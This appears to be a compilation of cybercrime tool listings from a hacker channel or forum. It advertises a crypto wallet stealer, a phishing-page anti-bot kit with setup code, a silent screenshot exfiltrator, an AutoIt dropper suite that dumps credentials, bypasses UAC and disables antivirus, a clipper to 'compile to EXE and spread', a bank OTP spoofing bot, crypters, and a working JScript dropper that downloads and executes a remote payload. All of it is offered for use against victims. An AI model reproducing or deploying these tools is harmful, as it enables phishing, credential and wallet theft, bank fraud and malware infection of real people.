🟠Remove Duplicates from Logs
🟠Remove 'UNKNOWN' from Logs
🟠Extract URLs from Logs
🟠Logs to COMBO
🟠Extract Specific Pattern
❔ How to run
python logsearch.py
🚀 ArtHouse Wallet Stealer 🐍💎 What Does It Do?
🔵Kills over 70+ browser processes (Chrome, Edge, Brave, Firefox, and more!)
🔵Stops Wallet Processes (MetaMask, Exodus, Trust Wallet, etc.) 💰🔵Extracts Wallet Data (Locate & Copy Wallet Data)
🔵Copies the found wallets to Documents\HWID\Wallets folder
😂 Why ?
❗️Because ArtHouse are scammers (https://t.me/c/1154385673/8702), they scammed me for botnet log training and this is the revenger.
❔How to Get Started
1️⃣Download Python, get some wallets.
2️⃣Install psutil over pip:
pip install psutil
3️⃣Run script:
python3 wallet_stealer.py
⚠️ Warning: This tool is powerful! Use it responsibly and ensure you have backups of important data.
🤖 BotMother Antibots 🤖🟢BotMother Antibots is used by Phishing Pages to keep Bots away from your Phishing site.
🔑 Features
▶️IP Blocking (Single/Ranges)
▶️Country Blocking
▶️User-Agent Blocking
▶️Cookie Fingerprint (bot don't use cookies)
▶️Header/Agent Deep Checks
▶️Redirection
▶️Logging
▶️Rate Limit Requests (30/minute)
▶️Test Mode for Developer.
👩💻 Code Implementation (Assuming the folder is in the current directory as "botMother"):
require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$bm->setExitLink("https://www.chase.com/"); / Redirect blocked bots to Chase
$bm->setGeoFilter("de,us,fr,uk"); // Allows Germany, USA, France, UK
$bm->setTestMode(false); // Disable test mode (real IP checks)
$bm->limitRequests(30, 60); // 30 requests/minute
$bm->validateHeaders(); // Check for bots/tools
$bm->checkFingerprint(); // Verify JS support (cookie)
$bm->run();
👍 For a example, checkout example.php, use the JavaScript at your Phishing Page, or else don't run "checkFingerprint".
ℹ️ You can put multiple countries on the allow list but also one.
💻 OWA Extractor & Validator 💻🔵This tool scans and validates emails by checking Outlook Web Access (OWA) portals. It extracts unique email addresses, verifies webmail logins, and sorts the results into organized files.
🔍 Features
✅ Multi-threaded for high speed
✅ Extracts & validates emails from webmail portals
✅ Saves sorted results into files
✅ Customizable via Settings.yml
💻 Setup & Run
1️⃣ Install dependencies
pip install requests beautifulsoup4 pyyaml colorama
2️⃣ Edit Settings.yml to configure threads & timeout. (you can leave by default). Put your emails (only emails) into Emails.txt.
3️⃣ Run the script
python OWA Extractor.py
4️⃣ Extracted emails will be saved in the Result/ folder.
Silent Telegram Screenshot Sender [Source Code] 👩💻🧾 Prerequisites
To compile and run this C# program, you need:
✅ Option 1: .NET SDK / Visual Studio Developer Command Prompt
▶️Install .NET SDK (https://dotnet.microsoft.com/en-us/download/dotnet) or
▶️Use Visual Studio with the Developer Command Prompt
✅ Option 2: Use csc.exe from Windows
* Comes with .NET Framework (on most Windows systems)
* Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
🔧 Compilation
1️⃣ Save the Code
Create a new text file, e.g., Program.cs, and paste the full C# code into it. Replace:
string token = "";
string chatId = "";
with your actual Telegram bot token and chat ID.
2️⃣Open CMD / PowerShell
Navigate to the directory where Program.cs is saved.
3️⃣Compile with CSC
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /target:exe /platform:x86 /optimize Program.cs
✅ This creates a file: Program.exe in the same folder.
If you're on 64-bit Windows, you can also try:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /optimize Program.cs
4️⃣ Run the Program
Now just execute the program:
Program.exe
🔴No window will open.
🔴No file will be saved.
🔴Screenshot is sent silently via Telegram.
💎 Features of the source code:
✅ Silent execution
🖼 Screenshot functionality
🖼 Telegram upload
💾 No file saved locally
🔄 Error fallback
🛠 Embedded Win32 calls
💎 Features of the Source Code
▶️ stub.au3: Dropper that extracts AutoUpdate.exe, Emai.exe, Scre.exe to C:\ProgramData\Skype, downloads LaZagne.exe for credential dumping, collects system info (Antivirus, antivirus, OS, CPU, IP), sets persistence, bypasses UAC, disables antivirus (244+ processes), and clears browser data.
▶️ Emai.au3: Sends log files (Passwords.txt, Info.txt, logs_*.htm) from C:\ProgramData\Skype via Gmail SMTP, deletes logs after sending, runs silently with admin privileges.
▶️ Scre.au3: Captures desktop screenshots and webcam images using DirectShow, sends them via Gmail SMTP, deletes files after sending, runs stealthily.
▶️ Main.au3: Nearly identical to Scre.au3, captures screenshots and webcam images, likely the source for Scre.exe.
▶️ All scripts use obfuscation, run silently (#NoTrayIcon), and require admin privileges (#RequireAdmin). Outputs are saved to C:\ProgramData\Skype (stub.au3, Emai.au3) or C:\Windows\log (Scre.au3, Main.au3).
✨ Features
🔵 Three Encryption Levels
🔵 Basic (Small & simple (wraps your code in a JS unescape))
🔵 Full (Hex-based encoding for added obfuscation)
🔵 Advanced (Base64 + shuffle + encryption key)
▶️ One-Click Decryption
▶️ Automatically detects encoding type and recovers original code
▶️ Dark/light theme toggle
▶️ File size & compression ratio display
▶️ Live preview for input/output
▶️ One-click copy & select-all
▶️ Clear fields instantly
☑️ Works entirely in your browser (offline)
🛠 How To Use
1️⃣Paste your HTML or JavaScript code in the Input field
2️⃣ Choose your encryption level: Basic, Full, or Advanced
3️⃣ Click Encode, the encrypted code appears in the output field
4️⃣Click Decode to reverse the encryption
5️⃣ Use Preview to check the live result
6️⃣ Copy it or select all with a single click
Tool in image represented.
settings.ini is for the settings, you can put there telegram bot token and so on.
⚙️ SETUP
Open settings.ini, put values. Then install requirements :
requests
colorama
bs4
ipaddress
urllib3
rich
botocore
discord
ipranges
telepot
pystyle
vonage
twilio
If there are any other requirements, write them in the comments.
❗️ Some people still get errors, post them down below. Questions about installing modules will be ignored because it is already clarified how to install.
To run the tool, use python3 legion.py
F-Automatical v8 [FREE]
Python 2.7 (Recommended)
🔥 Source code and fully deobfuscated by @scarletta_owner 🔥
FOX = F-Automatical v8
⚠️ This tool used imgur and gyazo api keys from fox himself. The tool was 1:1 copied from the cyber fox security channel which claim to be the latest fox channel. The function at line 120 and 129 are definitely showing us how the screens with HIS api keys been uploaded. Basically chromium was used to make a screen of your shells/cpanel pass resets on your email. The email was created to receive the passwords but basically he's checking new mails with api calls and not with chromium. Chromium driver was especially used to make screens and upload it on his api.
How to use ?
Install requirements like pyperclip, pyautogui, telebot and requests. Make script main.py and paste code, setup telegram bot and replace your BTC address. Obfuscate the source code, compile to EXE and spread.
SPOOFING OTP BOT OR BYPASS BOT
This is a dream bot for y’all ain’t no where else got it,
Will fetch code always around 190+ Countries for u ,Uses Plivo API
US , UK , CANADA.. Every country almost every bank
Won’t even need simswap or email access to fetch codes using this bot and it works instantly
« About OTPSPOOF_BOT »
1. Multiple modes to choose from
✅ PGP MODE
✅ PRESS 1 MODES
✅ REGULAR CALL MODES
✅ NO PRESS 1 CUSTOM MODE
✅ SIMPLE MODE
2. Unique scripts for each mode
✅ ALL LANGUAGES
✅ BANK SPOOFING
✅ EVENTS
✅ MORE
3. ALL countries supported
« Modes »
Bank mode / PayPal mode /
Account mode / Apple pay mode / Email mode / Carrier mode / Pin mode /
P2P mode (allows you to connect to the victim with a P2P encrypted call)
⏳Adding accept / deny
⏳Adding recordings
⏳Adding press 1 custom mode
⏳Referral System
⏳ Hold / Unhold
ALL ARE UP
Uses Twilio API and it's open source you can recode it
Unzip ur files and Download ngrok and run ngrok.exe http 5000
Download python
Open terminal and install modules
pip install flask
pip install requests
pip install phonenumbers
pip install twilio
pip install pyTelegramBotAPI
• Open cred.py and replace with your data
• Open connect dbase file for host it
• Open terminal and Run Python mainn.py
Instructions in readme.txt
Number Carrier Checker
- Fast Unlimited Queries
- No Need Proxies
- Lifetime Validity
* Generate Numbers by State
* Generate Numbers by Area Code
* Generate Numbers by Prefix
⚙️ Setup:
1️⃣ Create a text-file and name it whatever you want
2️⃣ Put your SMTPs inside, else copy results SMTP file and make sure you use following format:
host|port|user|pass
3️⃣ Install Python (If not installed)
Direct installer :
https://www.python.org/ftp/python/3.9.2/python-3.9.2-amd64.exe
Linux:
sudo apt install python3
Usage:
python3 smtp.py
(Linux)
py smtp.py (Windows)
1️⃣ Enter textfile name
2️⃣ Enter your email
2️⃣ Enter threads (5 are ok)
♦️ FEATURES
▪️Open Source
▪️No Backdoors
▪️No Trojan/Virus
▪️Successfully sent will be saved as "good.txt"
▪️Fast checking
🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.
1️⃣ Download Payload
The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).
var fileUrl = "https://url.com/windows.exe";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();
2️⃣ Save the Payload
The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.
var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();
3️⃣ Execute the Payload
After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:
➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.
if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}
🦅 To edit the script, edit line...
➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)
👉Fully Customizable
👉Source Code
👉Easy-To-Use
❔How to use
👉Download Apache and create a webserver on your linux/windows RDP.
👉Get your requirements for mailing ready and start the mailer.
Red Binder:
▪️Exe Binder
▪️Inbuilt Undetectable Crypter
▪️Any malware inject with crypter
Red Desktop Builder:
▪️Fully undetectable
▪️Use any installed exe in pc
▪️Use chrome, firefox (Download and execute any file)
▪️View File Explorer
Old Black Ops 2 Mod Menu. Source code for coders to see how a menu was made in earlier call of duty's
To use this "Mod Menu" if you have a modded console such as PS3, XBOX or Desktop PC, you need to download GSC studio. It's deprecated but archive.org have a backup
GSC Studio : https://archive.org/download/setup-gscstudio-160215_202109/setup-gscstudio-160215.exe
You can find on Youtube tutorial about injecting a gsc file
This tool is a combo editor with 33 editing module, fast speed and a hot UI created by Zentred from cracked(.)io - a hacker forum.
Preview of the tool : https://i.imgur.com/SLh8JVG.png
